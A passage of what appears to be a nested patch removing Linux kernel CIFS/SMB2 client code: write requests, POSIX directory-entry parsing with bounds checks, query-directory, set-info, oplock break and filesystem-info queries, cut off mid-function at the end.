+-	_io_parms = (struct cifs_io_parms) {
+-		.tcon = tcon,
+-		.server = server,
+-		.offset = wdata->offset,
+-		.length = wdata->bytes,
+-		.persistent_fid = wdata->cfile->fid.persistent_fid,
+-		.volatile_fid = wdata->cfile->fid.volatile_fid,
+-		.pid = wdata->pid,
+-	};
+-	io_parms = &_io_parms;
+-
+-	rc = smb2_plain_req_init(SMB2_WRITE, tcon, server,
+-				 (void **) &req, &total_len);
+-	if (rc)
+-		return rc;
+-
+-	if (smb3_encryption_required(tcon))
+-		flags |= CIFS_TRANSFORM_REQ;
+-
+-	shdr = (struct smb2_hdr *)req;
+-	shdr->Id.SyncId.ProcessId = cpu_to_le32(io_parms->pid);
+-
+-	req->PersistentFileId = io_parms->persistent_fid;
+-	req->VolatileFileId = io_parms->volatile_fid;
+-	req->WriteChannelInfoOffset = 0;
+-	req->WriteChannelInfoLength = 0;
+-	req->Channel = 0;
+-	req->Offset = cpu_to_le64(io_parms->offset);
+-	req->DataOffset = cpu_to_le16(
+-				offsetof(struct smb2_write_req, Buffer));
+-	req->RemainingBytes = 0;
+-
+-	trace_smb3_write_enter(0 /* xid */,
+-			       io_parms->persistent_fid,
+-			       io_parms->tcon->tid,
+-			       io_parms->tcon->ses->Suid,
+-			       io_parms->offset,
+-			       io_parms->length);
+-
+-#ifdef CONFIG_CIFS_SMB_DIRECT
+-	/*
+-	 * If we want to do a server RDMA read, fill in and append
+-	 * smbd_buffer_descriptor_v1 to the end of write request
+-	 */
+-	if (smb3_use_rdma_offload(io_parms)) {
+-		struct smbd_buffer_descriptor_v1 *v1;
+-		bool need_invalidate = server->dialect == SMB30_PROT_ID;
+-
+-		wdata->mr = smbd_register_mr(
+-				server->smbd_conn, wdata->pages,
+-				wdata->nr_pages, wdata->page_offset,
+-				wdata->tailsz, false, need_invalidate);
+-		if (!wdata->mr) {
+-			rc = -EAGAIN;
+-			goto async_writev_out;
+-		}
+-		req->Length = 0;
+-		req->DataOffset = 0;
+-		if (wdata->nr_pages > 1)
+-			req->RemainingBytes =
+-				cpu_to_le32(
+-					(wdata->nr_pages - 1) * wdata->pagesz -
+-					wdata->page_offset + wdata->tailsz
+-				);
+-		else
+-			req->RemainingBytes = cpu_to_le32(wdata->tailsz);
+-		req->Channel = SMB2_CHANNEL_RDMA_V1_INVALIDATE;
+-		if (need_invalidate)
+-			req->Channel = SMB2_CHANNEL_RDMA_V1;
+-		req->WriteChannelInfoOffset =
+-			cpu_to_le16(offsetof(struct smb2_write_req, Buffer));
+-		req->WriteChannelInfoLength =
+-			cpu_to_le16(sizeof(struct smbd_buffer_descriptor_v1));
+-		v1 = (struct smbd_buffer_descriptor_v1 *) &req->Buffer[0];
+-		v1->offset = cpu_to_le64(wdata->mr->mr->iova);
+-		v1->token = cpu_to_le32(wdata->mr->mr->rkey);
+-		v1->length = cpu_to_le32(wdata->mr->mr->length);
+-	}
+-#endif
+-	iov[0].iov_len = total_len - 1;
+-	iov[0].iov_base = (char *)req;
+-
+-	rqst.rq_iov = iov;
+-	rqst.rq_nvec = 1;
+-	rqst.rq_pages = wdata->pages;
+-	rqst.rq_offset = wdata->page_offset;
+-	rqst.rq_npages = wdata->nr_pages;
+-	rqst.rq_pagesz = wdata->pagesz;
+-	rqst.rq_tailsz = wdata->tailsz;
+-#ifdef CONFIG_CIFS_SMB_DIRECT
+-	if (wdata->mr) {
+-		iov[0].iov_len += sizeof(struct smbd_buffer_descriptor_v1);
+-		rqst.rq_npages = 0;
+-	}
+-#endif
+-	cifs_dbg(FYI, "async write at %llu %u bytes\n",
+-		 io_parms->offset, io_parms->length);
+-
+-#ifdef CONFIG_CIFS_SMB_DIRECT
+-	/* For RDMA read, I/O size is in RemainingBytes not in Length */
+-	if (!wdata->mr)
+-		req->Length = cpu_to_le32(io_parms->length);
+-#else
+-	req->Length = cpu_to_le32(io_parms->length);
+-#endif
+-
+-	if (wdata->credits.value > 0) {
+-		shdr->CreditCharge = cpu_to_le16(DIV_ROUND_UP(wdata->bytes,
+-						    SMB2_MAX_BUFFER_SIZE));
+-		shdr->CreditRequest = cpu_to_le16(le16_to_cpu(shdr->CreditCharge) + 8);
+-
+-		rc = adjust_credits(server, &wdata->credits, io_parms->length);
+-		if (rc)
+-			goto async_writev_out;
+-
+-		flags |= CIFS_HAS_CREDITS;
+-	}
+-
+-	kref_get(&wdata->refcount);
+-	rc = cifs_call_async(server, &rqst, NULL, smb2_writev_callback, NULL,
+-			     wdata, flags, &wdata->credits);
+-
+-	if (rc) {
+-		trace_smb3_write_err(0 /* no xid */,
+-				     io_parms->persistent_fid,
+-				     io_parms->tcon->tid,
+-				     io_parms->tcon->ses->Suid,
+-				     io_parms->offset,
+-				     io_parms->length,
+-				     rc);
+-		kref_put(&wdata->refcount, release);
+-		cifs_stats_fail_inc(tcon, SMB2_WRITE_HE);
+-	}
+-
+-async_writev_out:
+-	cifs_small_buf_release(req);
+-	return rc;
+-}
+-
+-/*
+- * The SMB2_write function takes an iov pointer to a kvec array, with n_vec as
+- * its length. The length field from io_parms must be at least 1 and indicates
+- * the number of elements with data to write, beginning at position 1 in the
+- * iov array. The total data length is specified by count.
+- */
+-int
+-SMB2_write(const unsigned int xid, struct cifs_io_parms *io_parms,
+-	   unsigned int *nbytes, struct kvec *iov, int n_vec)
+-{
+-	struct smb_rqst rqst;
+-	int rc = 0;
+-	struct smb2_write_req *req = NULL;
+-	struct smb2_write_rsp *rsp = NULL;
+-	int resp_buftype;
+-	struct kvec rsp_iov;
+-	int flags = 0;
+-	unsigned int total_len;
+-	struct TCP_Server_Info *server;
+-
+-	*nbytes = 0;
+-
+-	if (n_vec < 1)
+-		return rc;
+-
+-	if (!io_parms->server)
+-		io_parms->server = cifs_pick_channel(io_parms->tcon->ses);
+-	server = io_parms->server;
+-	if (server == NULL)
+-		return -ECONNABORTED;
+-
+-	rc = smb2_plain_req_init(SMB2_WRITE, io_parms->tcon, server,
+-				 (void **) &req, &total_len);
+-	if (rc)
+-		return rc;
+-
+-	if (smb3_encryption_required(io_parms->tcon))
+-		flags |= CIFS_TRANSFORM_REQ;
+-
+-	req->hdr.Id.SyncId.ProcessId = cpu_to_le32(io_parms->pid);
+-
+-	req->PersistentFileId = io_parms->persistent_fid;
+-	req->VolatileFileId = io_parms->volatile_fid;
+-	req->WriteChannelInfoOffset = 0;
+-	req->WriteChannelInfoLength = 0;
+-	req->Channel = 0;
+-	req->Length = cpu_to_le32(io_parms->length);
+-	req->Offset = cpu_to_le64(io_parms->offset);
+-	req->DataOffset = cpu_to_le16(
+-				offsetof(struct smb2_write_req, Buffer));
+-	req->RemainingBytes = 0;
+-
+-	trace_smb3_write_enter(xid, io_parms->persistent_fid,
+-		io_parms->tcon->tid, io_parms->tcon->ses->Suid,
+-		io_parms->offset, io_parms->length);
+-
+-	iov[0].iov_base = (char *)req;
+-	/* 1 for Buffer */
+-	iov[0].iov_len = total_len - 1;
+-
+-	memset(&rqst, 0, sizeof(struct smb_rqst));
+-	rqst.rq_iov = iov;
+-	rqst.rq_nvec = n_vec + 1;
+-
+-	rc = cifs_send_recv(xid, io_parms->tcon->ses, server,
+-			    &rqst,
+-			    &resp_buftype, flags, &rsp_iov);
+-	rsp = (struct smb2_write_rsp *)rsp_iov.iov_base;
+-
+-	if (rc) {
+-		trace_smb3_write_err(xid,
+-				     req->PersistentFileId,
+-				     io_parms->tcon->tid,
+-				     io_parms->tcon->ses->Suid,
+-				     io_parms->offset, io_parms->length, rc);
+-		cifs_stats_fail_inc(io_parms->tcon, SMB2_WRITE_HE);
+-		cifs_dbg(VFS, "Send error in write = %d\n", rc);
+-	} else {
+-		*nbytes = le32_to_cpu(rsp->DataLength);
+-		trace_smb3_write_done(xid,
+-				      req->PersistentFileId,
+-				      io_parms->tcon->tid,
+-				      io_parms->tcon->ses->Suid,
+-				      io_parms->offset, *nbytes);
+-	}
+-
+-	cifs_small_buf_release(req);
+-	free_rsp_buf(resp_buftype, rsp);
+-	return rc;
+-}
+-
+-int posix_info_sid_size(const void *beg, const void *end)
+-{
+-	size_t subauth;
+-	int total;
+-
+-	if (beg + 1 > end)
+-		return -1;
+-
+-	subauth = *(u8 *)(beg+1);
+-	if (subauth < 1 || subauth > 15)
+-		return -1;
+-
+-	total = 1 + 1 + 6 + 4*subauth;
+-	if (beg + total > end)
+-		return -1;
+-
+-	return total;
+-}
+-
+-int posix_info_parse(const void *beg, const void *end,
+-		     struct smb2_posix_info_parsed *out)
+-
+-{
+-	int total_len = 0;
+-	int owner_len, group_len;
+-	int name_len;
+-	const void *owner_sid;
+-	const void *group_sid;
+-	const void *name;
+-
+-	/* if no end bound given, assume payload to be correct */
+-	if (!end) {
+-		const struct smb2_posix_info *p = beg;
+-
+-		end = beg + le32_to_cpu(p->NextEntryOffset);
+-		/* last element will have a 0 offset, pick a sensible bound */
+-		if (end == beg)
+-			end += 0xFFFF;
+-	}
+-
+-	/* check base buf */
+-	if (beg + sizeof(struct smb2_posix_info) > end)
+-		return -1;
+-	total_len = sizeof(struct smb2_posix_info);
+-
+-	/* check owner sid */
+-	owner_sid = beg + total_len;
+-	owner_len = posix_info_sid_size(owner_sid, end);
+-	if (owner_len < 0)
+-		return -1;
+-	total_len += owner_len;
+-
+-	/* check group sid */
+-	group_sid = beg + total_len;
+-	group_len = posix_info_sid_size(group_sid, end);
+-	if (group_len < 0)
+-		return -1;
+-	total_len += group_len;
+-
+-	/* check name len */
+-	if (beg + total_len + 4 > end)
+-		return -1;
+-	name_len = le32_to_cpu(*(__le32 *)(beg + total_len));
+-	if (name_len < 1 || name_len > 0xFFFF)
+-		return -1;
+-	total_len += 4;
+-
+-	/* check name */
+-	name = beg + total_len;
+-	if (name + name_len > end)
+-		return -1;
+-	total_len += name_len;
+-
+-	if (out) {
+-		out->base = beg;
+-		out->size = total_len;
+-		out->name_len = name_len;
+-		out->name = name;
+-		memcpy(&out->owner, owner_sid, owner_len);
+-		memcpy(&out->group, group_sid, group_len);
+-	}
+-	return total_len;
+-}
+-
+-static int posix_info_extra_size(const void *beg, const void *end)
+-{
+-	int len = posix_info_parse(beg, end, NULL);
+-
+-	if (len < 0)
+-		return -1;
+-	return len - sizeof(struct smb2_posix_info);
+-}
+-
+-static unsigned int
+-num_entries(int infotype, char *bufstart, char *end_of_buf, char **lastentry,
+-	    size_t size)
+-{
+-	int len;
+-	unsigned int entrycount = 0;
+-	unsigned int next_offset = 0;
+-	char *entryptr;
+-	FILE_DIRECTORY_INFO *dir_info;
+-
+-	if (bufstart == NULL)
+-		return 0;
+-
+-	entryptr = bufstart;
+-
+-	while (1) {
+-		if (entryptr + next_offset < entryptr ||
+-		    entryptr + next_offset > end_of_buf ||
+-		    entryptr + next_offset + size > end_of_buf) {
+-			cifs_dbg(VFS, "malformed search entry would overflow\n");
+-			break;
+-		}
+-
+-		entryptr = entryptr + next_offset;
+-		dir_info = (FILE_DIRECTORY_INFO *)entryptr;
+-
+-		if (infotype == SMB_FIND_FILE_POSIX_INFO)
+-			len = posix_info_extra_size(entryptr, end_of_buf);
+-		else
+-			len = le32_to_cpu(dir_info->FileNameLength);
+-
+-		if (len < 0 ||
+-		    entryptr + len < entryptr ||
+-		    entryptr + len > end_of_buf ||
+-		    entryptr + len + size > end_of_buf) {
+-			cifs_dbg(VFS, "directory entry name would overflow frame end of buf %p\n",
+-				 end_of_buf);
+-			break;
+-		}
+-
+-		*lastentry = entryptr;
+-		entrycount++;
+-
+-		next_offset = le32_to_cpu(dir_info->NextEntryOffset);
+-		if (!next_offset)
+-			break;
+-	}
+-
+-	return entrycount;
+-}
+-
+-/*
+- * Readdir/FindFirst
+- */
+-int SMB2_query_directory_init(const unsigned int xid,
+-			      struct cifs_tcon *tcon,
+-			      struct TCP_Server_Info *server,
+-			      struct smb_rqst *rqst,
+-			      u64 persistent_fid, u64 volatile_fid,
+-			      int index, int info_level)
+-{
+-	struct smb2_query_directory_req *req;
+-	unsigned char *bufptr;
+-	__le16 asteriks = cpu_to_le16('*');
+-	unsigned int output_size = CIFSMaxBufSize -
+-		MAX_SMB2_CREATE_RESPONSE_SIZE -
+-		MAX_SMB2_CLOSE_RESPONSE_SIZE;
+-	unsigned int total_len;
+-	struct kvec *iov = rqst->rq_iov;
+-	int len, rc;
+-
+-	rc = smb2_plain_req_init(SMB2_QUERY_DIRECTORY, tcon, server,
+-				 (void **) &req, &total_len);
+-	if (rc)
+-		return rc;
+-
+-	switch (info_level) {
+-	case SMB_FIND_FILE_DIRECTORY_INFO:
+-		req->FileInformationClass = FILE_DIRECTORY_INFORMATION;
+-		break;
+-	case SMB_FIND_FILE_ID_FULL_DIR_INFO:
+-		req->FileInformationClass = FILEID_FULL_DIRECTORY_INFORMATION;
+-		break;
+-	case SMB_FIND_FILE_POSIX_INFO:
+-		req->FileInformationClass = SMB_FIND_FILE_POSIX_INFO;
+-		break;
+-	default:
+-		cifs_tcon_dbg(VFS, "info level %u isn't supported\n",
+-			info_level);
+-		return -EINVAL;
+-	}
+-
+-	req->FileIndex = cpu_to_le32(index);
+-	req->PersistentFileId = persistent_fid;
+-	req->VolatileFileId = volatile_fid;
+-
+-	len = 0x2;
+-	bufptr = req->Buffer;
+-	memcpy(bufptr, &asteriks, len);
+-
+-	req->FileNameOffset =
+-		cpu_to_le16(sizeof(struct smb2_query_directory_req) - 1);
+-	req->FileNameLength = cpu_to_le16(len);
+-	/*
+-	 * BB could be 30 bytes or so longer if we used SMB2 specific
+-	 * buffer lengths, but this is safe and close enough.
+-	 */
+-	output_size = min_t(unsigned int, output_size, server->maxBuf);
+-	output_size = min_t(unsigned int, output_size, 2 << 15);
+-	req->OutputBufferLength = cpu_to_le32(output_size);
+-
+-	iov[0].iov_base = (char *)req;
+-	/* 1 for Buffer */
+-	iov[0].iov_len = total_len - 1;
+-
+-	iov[1].iov_base = (char *)(req->Buffer);
+-	iov[1].iov_len = len;
+-
+-	trace_smb3_query_dir_enter(xid, persistent_fid, tcon->tid,
+-			tcon->ses->Suid, index, output_size);
+-
+-	return 0;
+-}
+-
+-void SMB2_query_directory_free(struct smb_rqst *rqst)
+-{
+-	if (rqst && rqst->rq_iov) {
+-		cifs_small_buf_release(rqst->rq_iov[0].iov_base); /* request */
+-	}
+-}
+-
+-int
+-smb2_parse_query_directory(struct cifs_tcon *tcon,
+-			   struct kvec *rsp_iov,
+-			   int resp_buftype,
+-			   struct cifs_search_info *srch_inf)
+-{
+-	struct smb2_query_directory_rsp *rsp;
+-	size_t info_buf_size;
+-	char *end_of_smb;
+-	int rc;
+-
+-	rsp = (struct smb2_query_directory_rsp *)rsp_iov->iov_base;
+-
+-	switch (srch_inf->info_level) {
+-	case SMB_FIND_FILE_DIRECTORY_INFO:
+-		info_buf_size = sizeof(FILE_DIRECTORY_INFO) - 1;
+-		break;
+-	case SMB_FIND_FILE_ID_FULL_DIR_INFO:
+-		info_buf_size = sizeof(SEARCH_ID_FULL_DIR_INFO) - 1;
+-		break;
+-	case SMB_FIND_FILE_POSIX_INFO:
+-		/* note that posix payloads are variable size */
+-		info_buf_size = sizeof(struct smb2_posix_info);
+-		break;
+-	default:
+-		cifs_tcon_dbg(VFS, "info level %u isn't supported\n",
+-			 srch_inf->info_level);
+-		return -EINVAL;
+-	}
+-
+-	rc = smb2_validate_iov(le16_to_cpu(rsp->OutputBufferOffset),
+-			       le32_to_cpu(rsp->OutputBufferLength), rsp_iov,
+-			       info_buf_size);
+-	if (rc) {
+-		cifs_tcon_dbg(VFS, "bad info payload");
+-		return rc;
+-	}
+-
+-	srch_inf->unicode = true;
+-
+-	if (srch_inf->ntwrk_buf_start) {
+-		if (srch_inf->smallBuf)
+-			cifs_small_buf_release(srch_inf->ntwrk_buf_start);
+-		else
+-			cifs_buf_release(srch_inf->ntwrk_buf_start);
+-	}
+-	srch_inf->ntwrk_buf_start = (char *)rsp;
+-	srch_inf->srch_entries_start = srch_inf->last_entry =
+-		(char *)rsp + le16_to_cpu(rsp->OutputBufferOffset);
+-	end_of_smb = rsp_iov->iov_len + (char *)rsp;
+-
+-	srch_inf->entries_in_buffer = num_entries(
+-		srch_inf->info_level,
+-		srch_inf->srch_entries_start,
+-		end_of_smb,
+-		&srch_inf->last_entry,
+-		info_buf_size);
+-
+-	srch_inf->index_of_last_entry += srch_inf->entries_in_buffer;
+-	cifs_dbg(FYI, "num entries %d last_index %lld srch start %p srch end %p\n",
+-		 srch_inf->entries_in_buffer, srch_inf->index_of_last_entry,
+-		 srch_inf->srch_entries_start, srch_inf->last_entry);
+-	if (resp_buftype == CIFS_LARGE_BUFFER)
+-		srch_inf->smallBuf = false;
+-	else if (resp_buftype == CIFS_SMALL_BUFFER)
+-		srch_inf->smallBuf = true;
+-	else
+-		cifs_tcon_dbg(VFS, "Invalid search buffer type\n");
+-
+-	return 0;
+-}
+-
+-int
+-SMB2_query_directory(const unsigned int xid, struct cifs_tcon *tcon,
+-		     u64 persistent_fid, u64 volatile_fid, int index,
+-		     struct cifs_search_info *srch_inf)
+-{
+-	struct smb_rqst rqst;
+-	struct kvec iov[SMB2_QUERY_DIRECTORY_IOV_SIZE];
+-	struct smb2_query_directory_rsp *rsp = NULL;
+-	int resp_buftype = CIFS_NO_BUFFER;
+-	struct kvec rsp_iov;
+-	int rc = 0;
+-	struct cifs_ses *ses = tcon->ses;
+-	struct TCP_Server_Info *server = cifs_pick_channel(ses);
+-	int flags = 0;
+-
+-	if (!ses || !(ses->server))
+-		return -EIO;
+-
+-	if (smb3_encryption_required(tcon))
+-		flags |= CIFS_TRANSFORM_REQ;
+-
+-	memset(&rqst, 0, sizeof(struct smb_rqst));
+-	memset(&iov, 0, sizeof(iov));
+-	rqst.rq_iov = iov;
+-	rqst.rq_nvec = SMB2_QUERY_DIRECTORY_IOV_SIZE;
+-
+-	rc = SMB2_query_directory_init(xid, tcon, server,
+-				       &rqst, persistent_fid,
+-				       volatile_fid, index,
+-				       srch_inf->info_level);
+-	if (rc)
+-		goto qdir_exit;
+-
+-	rc = cifs_send_recv(xid, ses, server,
+-			    &rqst, &resp_buftype, flags, &rsp_iov);
+-	rsp = (struct smb2_query_directory_rsp *)rsp_iov.iov_base;
+-
+-	if (rc) {
+-		if (rc == -ENODATA &&
+-		    rsp->hdr.Status == STATUS_NO_MORE_FILES) {
+-			trace_smb3_query_dir_done(xid, persistent_fid,
+-				tcon->tid, tcon->ses->Suid, index, 0);
+-			srch_inf->endOfSearch = true;
+-			rc = 0;
+-		} else {
+-			trace_smb3_query_dir_err(xid, persistent_fid, tcon->tid,
+-				tcon->ses->Suid, index, 0, rc);
+-			cifs_stats_fail_inc(tcon, SMB2_QUERY_DIRECTORY_HE);
+-		}
+-		goto qdir_exit;
+-	}
+-
+-	rc = smb2_parse_query_directory(tcon, &rsp_iov,	resp_buftype,
+-					srch_inf);
+-	if (rc) {
+-		trace_smb3_query_dir_err(xid, persistent_fid, tcon->tid,
+-			tcon->ses->Suid, index, 0, rc);
+-		goto qdir_exit;
+-	}
+-	resp_buftype = CIFS_NO_BUFFER;
+-
+-	trace_smb3_query_dir_done(xid, persistent_fid, tcon->tid,
+-			tcon->ses->Suid, index, srch_inf->entries_in_buffer);
+-
+-qdir_exit:
+-	SMB2_query_directory_free(&rqst);
+-	free_rsp_buf(resp_buftype, rsp);
+-	return rc;
+-}
+-
+-int
+-SMB2_set_info_init(struct cifs_tcon *tcon, struct TCP_Server_Info *server,
+-		   struct smb_rqst *rqst,
+-		   u64 persistent_fid, u64 volatile_fid, u32 pid,
+-		   u8 info_class, u8 info_type, u32 additional_info,
+-		   void **data, unsigned int *size)
+-{
+-	struct smb2_set_info_req *req;
+-	struct kvec *iov = rqst->rq_iov;
+-	unsigned int i, total_len;
+-	int rc;
+-
+-	rc = smb2_plain_req_init(SMB2_SET_INFO, tcon, server,
+-				 (void **) &req, &total_len);
+-	if (rc)
+-		return rc;
+-
+-	req->hdr.Id.SyncId.ProcessId = cpu_to_le32(pid);
+-	req->InfoType = info_type;
+-	req->FileInfoClass = info_class;
+-	req->PersistentFileId = persistent_fid;
+-	req->VolatileFileId = volatile_fid;
+-	req->AdditionalInformation = cpu_to_le32(additional_info);
+-
+-	req->BufferOffset =
+-			cpu_to_le16(sizeof(struct smb2_set_info_req) - 1);
+-	req->BufferLength = cpu_to_le32(*size);
+-
+-	memcpy(req->Buffer, *data, *size);
+-	total_len += *size;
+-
+-	iov[0].iov_base = (char *)req;
+-	/* 1 for Buffer */
+-	iov[0].iov_len = total_len - 1;
+-
+-	for (i = 1; i < rqst->rq_nvec; i++) {
+-		le32_add_cpu(&req->BufferLength, size[i]);
+-		iov[i].iov_base = (char *)data[i];
+-		iov[i].iov_len = size[i];
+-	}
+-
+-	return 0;
+-}
+-
+-void
+-SMB2_set_info_free(struct smb_rqst *rqst)
+-{
+-	if (rqst && rqst->rq_iov)
+-		cifs_buf_release(rqst->rq_iov[0].iov_base); /* request */
+-}
+-
+-static int
+-send_set_info(const unsigned int xid, struct cifs_tcon *tcon,
+-	       u64 persistent_fid, u64 volatile_fid, u32 pid, u8 info_class,
+-	       u8 info_type, u32 additional_info, unsigned int num,
+-		void **data, unsigned int *size)
+-{
+-	struct smb_rqst rqst;
+-	struct smb2_set_info_rsp *rsp = NULL;
+-	struct kvec *iov;
+-	struct kvec rsp_iov;
+-	int rc = 0;
+-	int resp_buftype;
+-	struct cifs_ses *ses = tcon->ses;
+-	struct TCP_Server_Info *server = cifs_pick_channel(ses);
+-	int flags = 0;
+-
+-	if (!ses || !server)
+-		return -EIO;
+-
+-	if (!num)
+-		return -EINVAL;
+-
+-	if (smb3_encryption_required(tcon))
+-		flags |= CIFS_TRANSFORM_REQ;
+-
+-	iov = kmalloc_array(num, sizeof(struct kvec), GFP_KERNEL);
+-	if (!iov)
+-		return -ENOMEM;
+-
+-	memset(&rqst, 0, sizeof(struct smb_rqst));
+-	rqst.rq_iov = iov;
+-	rqst.rq_nvec = num;
+-
+-	rc = SMB2_set_info_init(tcon, server,
+-				&rqst, persistent_fid, volatile_fid, pid,
+-				info_class, info_type, additional_info,
+-				data, size);
+-	if (rc) {
+-		kfree(iov);
+-		return rc;
+-	}
+-
+-
+-	rc = cifs_send_recv(xid, ses, server,
+-			    &rqst, &resp_buftype, flags,
+-			    &rsp_iov);
+-	SMB2_set_info_free(&rqst);
+-	rsp = (struct smb2_set_info_rsp *)rsp_iov.iov_base;
+-
+-	if (rc != 0) {
+-		cifs_stats_fail_inc(tcon, SMB2_SET_INFO_HE);
+-		trace_smb3_set_info_err(xid, persistent_fid, tcon->tid,
+-				ses->Suid, info_class, (__u32)info_type, rc);
+-	}
+-
+-	free_rsp_buf(resp_buftype, rsp);
+-	kfree(iov);
+-	return rc;
+-}
+-
+-int
+-SMB2_set_eof(const unsigned int xid, struct cifs_tcon *tcon, u64 persistent_fid,
+-	     u64 volatile_fid, u32 pid, __le64 *eof)
+-{
+-	struct smb2_file_eof_info info;
+-	void *data;
+-	unsigned int size;
+-
+-	info.EndOfFile = *eof;
+-
+-	data = &info;
+-	size = sizeof(struct smb2_file_eof_info);
+-
+-	trace_smb3_set_eof(xid, persistent_fid, tcon->tid, tcon->ses->Suid, le64_to_cpu(*eof));
+-
+-	return send_set_info(xid, tcon, persistent_fid, volatile_fid,
+-			pid, FILE_END_OF_FILE_INFORMATION, SMB2_O_INFO_FILE,
+-			0, 1, &data, &size);
+-}
+-
+-int
+-SMB2_set_acl(const unsigned int xid, struct cifs_tcon *tcon,
+-		u64 persistent_fid, u64 volatile_fid,
+-		struct cifs_ntsd *pnntsd, int pacllen, int aclflag)
+-{
+-	return send_set_info(xid, tcon, persistent_fid, volatile_fid,
+-			current->tgid, 0, SMB2_O_INFO_SECURITY, aclflag,
+-			1, (void **)&pnntsd, &pacllen);
+-}
+-
+-int
+-SMB2_set_ea(const unsigned int xid, struct cifs_tcon *tcon,
+-	    u64 persistent_fid, u64 volatile_fid,
+-	    struct smb2_file_full_ea_info *buf, int len)
+-{
+-	return send_set_info(xid, tcon, persistent_fid, volatile_fid,
+-		current->tgid, FILE_FULL_EA_INFORMATION, SMB2_O_INFO_FILE,
+-		0, 1, (void **)&buf, &len);
+-}
+-
+-int
+-SMB2_oplock_break(const unsigned int xid, struct cifs_tcon *tcon,
+-		  const u64 persistent_fid, const u64 volatile_fid,
+-		  __u8 oplock_level)
+-{
+-	struct smb_rqst rqst;
+-	int rc;
+-	struct smb2_oplock_break *req = NULL;
+-	struct cifs_ses *ses = tcon->ses;
+-	struct TCP_Server_Info *server = cifs_pick_channel(ses);
+-	int flags = CIFS_OBREAK_OP;
+-	unsigned int total_len;
+-	struct kvec iov[1];
+-	struct kvec rsp_iov;
+-	int resp_buf_type;
+-
+-	cifs_dbg(FYI, "SMB2_oplock_break\n");
+-	rc = smb2_plain_req_init(SMB2_OPLOCK_BREAK, tcon, server,
+-				 (void **) &req, &total_len);
+-	if (rc)
+-		return rc;
+-
+-	if (smb3_encryption_required(tcon))
+-		flags |= CIFS_TRANSFORM_REQ;
+-
+-	req->VolatileFid = volatile_fid;
+-	req->PersistentFid = persistent_fid;
+-	req->OplockLevel = oplock_level;
+-	req->hdr.CreditRequest = cpu_to_le16(1);
+-
+-	flags |= CIFS_NO_RSP_BUF;
+-
+-	iov[0].iov_base = (char *)req;
+-	iov[0].iov_len = total_len;
+-
+-	memset(&rqst, 0, sizeof(struct smb_rqst));
+-	rqst.rq_iov = iov;
+-	rqst.rq_nvec = 1;
+-
+-	rc = cifs_send_recv(xid, ses, server,
+-			    &rqst, &resp_buf_type, flags, &rsp_iov);
+-	cifs_small_buf_release(req);
+-
+-	if (rc) {
+-		cifs_stats_fail_inc(tcon, SMB2_OPLOCK_BREAK_HE);
+-		cifs_dbg(FYI, "Send error in Oplock Break = %d\n", rc);
+-	}
+-
+-	return rc;
+-}
+-
+-void
+-smb2_copy_fs_info_to_kstatfs(struct smb2_fs_full_size_info *pfs_inf,
+-			     struct kstatfs *kst)
+-{
+-	kst->f_bsize = le32_to_cpu(pfs_inf->BytesPerSector) *
+-			  le32_to_cpu(pfs_inf->SectorsPerAllocationUnit);
+-	kst->f_blocks = le64_to_cpu(pfs_inf->TotalAllocationUnits);
+-	kst->f_bfree  = kst->f_bavail =
+-			le64_to_cpu(pfs_inf->CallerAvailableAllocationUnits);
+-	return;
+-}
+-
+-static void
+-copy_posix_fs_info_to_kstatfs(FILE_SYSTEM_POSIX_INFO *response_data,
+-			struct kstatfs *kst)
+-{
+-	kst->f_bsize = le32_to_cpu(response_data->BlockSize);
+-	kst->f_blocks = le64_to_cpu(response_data->TotalBlocks);
+-	kst->f_bfree =  le64_to_cpu(response_data->BlocksAvail);
+-	if (response_data->UserBlocksAvail == cpu_to_le64(-1))
+-		kst->f_bavail = kst->f_bfree;
+-	else
+-		kst->f_bavail = le64_to_cpu(response_data->UserBlocksAvail);
+-	if (response_data->TotalFileNodes != cpu_to_le64(-1))
+-		kst->f_files = le64_to_cpu(response_data->TotalFileNodes);
+-	if (response_data->FreeFileNodes != cpu_to_le64(-1))
+-		kst->f_ffree = le64_to_cpu(response_data->FreeFileNodes);
+-
+-	return;
+-}
+-
+-static int
+-build_qfs_info_req(struct kvec *iov, struct cifs_tcon *tcon,
+-		   struct TCP_Server_Info *server,
+-		   int level, int outbuf_len, u64 persistent_fid,
+-		   u64 volatile_fid)
+-{
+-	int rc;
+-	struct smb2_query_info_req *req;
+-	unsigned int total_len;
+-
+-	cifs_dbg(FYI, "Query FSInfo level %d\n", level);
+-
+-	if ((tcon->ses == NULL) || server == NULL)
+-		return -EIO;
+-
+-	rc = smb2_plain_req_init(SMB2_QUERY_INFO, tcon, server,
+-				 (void **) &req, &total_len);
+-	if (rc)
+-		return rc;
+-
+-	req->InfoType = SMB2_O_INFO_FILESYSTEM;
+-	req->FileInfoClass = level;
+-	req->PersistentFileId = persistent_fid;
+-	req->VolatileFileId = volatile_fid;
+-	/* 1 for pad */
+-	req->InputBufferOffset =
+-			cpu_to_le16(sizeof(struct smb2_query_info_req) - 1);
+-	req->OutputBufferLength = cpu_to_le32(
+-		outbuf_len + sizeof(struct smb2_query_info_rsp) - 1);
+-
+-	iov->iov_base = (char *)req;
+-	iov->iov_len = total_len;
+-	return 0;
+-}
+-
+-int
+-SMB311_posix_qfs_info(const unsigned int xid, struct cifs_tcon *tcon,
+-	      u64 persistent_fid, u64 volatile_fid, struct kstatfs *fsdata)
+-{
+-	struct smb_rqst rqst;
+-	struct smb2_query_info_rsp *rsp = NULL;
+-	struct kvec iov;
+-	struct kvec rsp_iov;
+-	int rc = 0;
+-	int resp_buftype;
+-	struct cifs_ses *ses = tcon->ses;
+-	struct TCP_Server_Info *server = cifs_pick_channel(ses);
+-	FILE_SYSTEM_POSIX_INFO *info = NULL;
+-	int flags = 0;
+-
+-	rc = build_qfs_info_req(&iov, tcon, server,
+-				FS_POSIX_INFORMATION,
+-				sizeof(FILE_SYSTEM_POSIX_INFO),
+-				persistent_fid, volatile_fid);
+-	if (rc)
+-		return rc;
+-
+-	if (smb3_encryption_required(tcon))
+-		flags |= CIFS_TRANSFORM_REQ;
+-
+-	memset(&rqst, 0, sizeof(struct smb_rqst));
+-	rqst.rq_iov = &iov;
+-	rqst.rq_nvec = 1;
+-
+-	rc = cifs_send_recv(xid, ses, server,
+-			    &rqst, &resp_buftype, flags, &rsp_iov);
+-	cifs_small_buf_release(iov.iov_base);
+-	if (rc) {
+-		cifs_stats_fail_inc(tcon, SMB2_QUERY_INFO_HE);
+-		goto posix_qfsinf_exit;
+-	}
+-	rsp = (struct smb2_query_info_rsp *)rsp_iov.iov_base;
+-
+-	info = (FILE_SYSTEM_POSIX_INFO *)(
